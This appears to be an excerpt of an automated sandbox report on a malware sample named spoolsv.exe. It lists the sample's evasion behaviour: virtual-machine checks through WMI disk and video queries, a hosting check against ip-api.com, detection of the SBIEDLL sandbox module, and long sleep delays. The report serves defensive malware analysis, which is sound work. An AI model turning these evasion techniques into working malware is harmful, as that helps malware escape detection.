                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

                            Malware Analysis System Evasion

                            barindex
                            Yara detected AntiVM3
                            Source: Yara matchFile source: Process Memory Space: spoolsv.exe PID: 4828, type: MEMORYSTR
                            Check if machine is in data center or colocation facility
                            Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                            Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
                            Source: C:\Users\user\AppData\Local\Temp\attzwu.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                            Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                            Source: C:\Users\user\Desktop\spoolsv.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                            Source: C:\Users\user\Desktop\spoolsv.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                            Source: C:\Users\user\AppData\Local\Temp\attzwu.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                            Source: spoolsv.exeBinary or memory string: SBIEDLL.DLL
                            Source: C:\Users\user\Desktop\spoolsv.exeMemory allocated: 2CD0000 memory reserve | memory write watch
                            Source: C:\Users\user\Desktop\spoolsv.exeMemory allocated: 1AEC0000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\spoolsv.exeMemory allocated: E70000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\spoolsv.exeMemory allocated: 1AD70000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\spoolsv.exeMemory allocated: 1130000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\spoolsv.exeMemory allocated: 1B120000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\spoolsv.exeMemory allocated: 14F0000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\spoolsv.exeMemory allocated: 1AFF0000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\spoolsv.exeMemory allocated: D50000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\spoolsv.exeMemory allocated: 1A960000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\attzwu.exeMemory allocated: 1600000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\attzwu.exeMemory allocated: 3280000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\attzwu.exeMemory allocated: 3080000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\spoolsv.exeMemory allocated: 10D0000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\spoolsv.exeMemory allocated: 1ADA0000 memory reserve | memory write watch
                            Source: C:\Users\user\Desktop\spoolsv.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeThread delayed: delay time: 600000Jump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeThread delayed: delay time: 599875Jump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeThread delayed: delay time: 599765Jump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeThread delayed: delay time: 599656Jump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeThread delayed: delay time: 599547Jump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeThread delayed: delay time: 599437Jump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeThread delayed: delay time: 599328Jump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeThread delayed: delay time: 599219Jump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeThread delayed: delay time: 599094Jump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeThread delayed: delay time: 598984Jump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeThread delayed: delay time: 598875Jump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeThread delayed: delay time: 598765Jump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeThread delayed: delay time: 598656Jump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeThread delayed: delay time: 598547Jump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeThread delayed: delay time: 598437Jump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeThread delayed: delay time: 598326Jump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeThread delayed: delay time: 598216Jump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeThread delayed: delay time: 598094Jump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeThread delayed: delay time: 597984Jump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeThread delayed: delay time: 597874Jump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeThread delayed: delay time: 597765Jump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeThread delayed: delay time: 597656Jump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeThread delayed: delay time: 597547Jump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeThread delayed: delay time: 597437Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Local\Temp\spoolsv.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Local\Temp\spoolsv.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Local\Temp\spoolsv.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Local\Temp\spoolsv.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Local\Temp\attzwu.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Local\Temp\attzwu.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Local\Temp\spoolsv.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\Desktop\spoolsv.exeWindow / User API: threadDelayed 1146Jump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeWindow / User API: threadDelayed 8681Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5519
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4245
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6844
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2735
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6916
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2760
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7631
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1966
                            Source: C:\Users\user\AppData\Local\Temp\attzwu.exeWindow / User API: threadDelayed 3760
                            Source: C:\Users\user\Desktop\spoolsv.exe TID: 1552Thread sleep time: -27670116110564310s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exe TID: 1552Thread sleep time: -600000s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exe TID: 1552Thread sleep time: -599875s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exe TID: 1552Thread sleep time: -599765s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exe TID: 1552Thread sleep time: -599656s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exe TID: 1552Thread sleep time: -599547s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exe TID: 1552Thread sleep time: -599437s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exe TID: 1552Thread sleep time: -599328s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exe TID: 1552Thread sleep time: -599219s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exe TID: 1552Thread sleep time: -599094s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exe TID: 1552Thread sleep time: -598984s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exe TID: 1552Thread sleep time: -598875s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exe TID: 1552Thread sleep time: -598765s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exe TID: 1552Thread sleep time: -598656s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exe TID: 1552Thread sleep time: -598547s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exe TID: 1552Thread sleep time: -598437s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exe TID: 1552Thread sleep time: -598326s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exe TID: 1552Thread sleep time: -598216s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exe TID: 1552Thread sleep time: -598094s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exe TID: 1552Thread sleep time: -597984s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exe TID: 1552Thread sleep time: -597874s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exe TID: 1552Thread sleep time: -597765s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exe TID: 1552Thread sleep time: -597656s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exe TID: 1552Thread sleep time: -597547s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exe TID: 1552Thread sleep time: -597437s >= -30000sJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7668Thread sleep time: -5534023222112862s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7852Thread sleep count: 6844 > 30
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7840Thread sleep count: 2735 > 30
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7892Thread sleep time: -6456360425798339s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8132Thread sleep time: -2767011611056431s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6596Thread sleep time: -2767011611056431s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\spoolsv.exe TID: 1292Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\spoolsv.exe TID: 7668Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\spoolsv.exe TID: 6468Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\spoolsv.exe TID: 3744Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\attzwu.exe TID: 3616Thread sleep time: -11068046444225724s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\attzwu.exe TID: 1368Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\spoolsv.exe TID: 7948Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Users\user\Desktop\spoolsv.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
